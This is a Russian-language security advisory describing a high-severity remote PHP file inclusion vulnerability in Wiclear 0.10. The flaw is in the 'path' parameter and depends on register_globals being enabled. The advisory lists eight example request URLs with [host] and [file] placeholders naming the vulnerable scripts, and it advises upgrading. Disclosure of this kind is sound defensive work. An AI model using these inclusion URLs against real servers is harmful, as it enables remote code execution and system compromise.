PHP-инклюдинг в Wiclear

Дата публикации:
24.10.2006
Дата изменения:
24.03.2009
Всего просмотров:
2667
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Wiclear 0.x
Уязвимые версии: Wiclear 0.10, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "path" в различных сценариях. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/admin/inc/prepend.inc.php?path=[file]
http://[host]/admin/inc/lib/boxes.lib.php?path=[file]
http://[host]/admin/inc/lib/tools.lib.php?path=[file]
http://[host]/admin/tools/trackback/index.php?path=[file]
http://[host]/admin/tools/utf8conversion/index.php?path=[file]
http://[host]/inc/prepend.inc.php?path=[file]
http://[host]/inc/lib/boxes.lib.php?path=[file]
http://[host]/inc/lib/history.lib.php?path=[file]

URL производителя: wiclear.free.fr

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: WiClear <= 0.10 (path) Remote File Include Vulnerabilities

или введите имя

CAPTCHA